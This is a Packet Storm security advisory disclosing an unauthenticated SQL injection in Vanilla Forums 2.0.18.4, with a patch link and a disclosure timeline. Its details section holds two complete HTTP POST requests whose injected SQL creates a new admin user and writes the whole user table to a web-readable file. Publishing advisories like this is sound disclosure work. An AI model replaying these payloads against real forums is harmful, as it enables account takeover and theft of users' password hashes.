Vanilla Forums 2.0.18.4 SQL Injection

2013-04-08T00:00:00
ID PACKETSTORM:121151
Type packetstorm
Reporter Michael Schratt
Modified 2013-04-08T00:00:00

Description

                                        
                                            `Product Name:  
  
Vanilla Forums  
  
Vulnerable Version:  
  
Up to vanilla-core-2-0-18-4  
  
Tested on:  
  
Windows Server 2003  
Apache 2.4.3  
PHP 5.4.7  
MySQL 5.5.27  
  
Vulnerability Overview:  
  
SQL-Injection is possible, because$_POST arrays are not proper   
sanitized.  
You do not need to be authenticated.  
  
Vulnerability Details:  
  
To insert an arbitrary user, a sample HTTP-Post Request looks as   
follows:  
  
POST /[PATH]/vanilla/entry/signin HTTP/1.1  
Host: [HOST]  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101   
Firefox/19.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
Cookie: [any cookie]  
Connection: keep-alive  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 399  
  
Form%2FTransientKey=VQYSOG2F3D38&Form%2Fhpt=&Form%2FTarget=discussions&  
Form%2FClientHour=2013-3-28+11%3A37&Form%2FEmail['admin';INSERT INTO   
gdn_user  
(UserID, Name, Password, HashMethod, DateInserted, Admin, Permissions)  
VALUES (NULL, '1234', '$P$BayO4QrMb9wgzdjNhlUBWdQcVaMnKN0', 'Vanilla',  
'2013-03-28 00:00:00', '1',   
'');#]=abcd&Form%2FPassword=*&Form%2FSign_In=  
Sign+In&Checkboxes%5B%5D=RememberMe  
  
Indeed you has to take care of the proper encryption algorithm which is   
currently used.  
  
As it is not possible to get the user table displayed on the website,   
you could establish an attack as follows:  
  
POST /[PATH]/vanilla/entry/passwordrequest HTTP/1.1  
Host: [HOST]  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101   
Firefox/19.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
Connection: keep-alive  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 255  
  
Form%2FTransientKey=OJS6EB1J0KW7&Form%2Fhpt=&Form%2FEmail['ac';select *  
from gdn_user into outfile '[FULL_PATH]\\vanilla\\out.txt' #]=13&  
Form%2FRequest_a_new_password=Request+a+new+password  
  
Update Link:  
  
http://vanillaforums.org/discussion/23339/security-update-vanilla-2-0-18-7  
  
Credits:  
  
This vulnerability was discovered by Michael Schratt  
Mail: mail @ mfs-enterprise . com  
Web:   
http://mfs-enterprise.com/wordpress/2013/04/05/vanilla-forums-2-0-18-sql-injection-insert-arbitrary-user-dump-usertable/  
Twitter: @bl4ckw0rm  
  
Timeline:  
  
Mar 28, 2013 – Discovered vulnerability  
Mar 28, 2013 – Contacted vanilla forums and asked for security contact  
Mar 28, 2013 – Vanilla Forums responded  
Mar 28, 2013 – Transfered vulnerability details  
Apr 02, 2013 – Requested update  
Apr 04, 2013 – Requested update  
Apr 05, 2013 – Patch released  
Apr 05, 2013 – Public advisory released  
`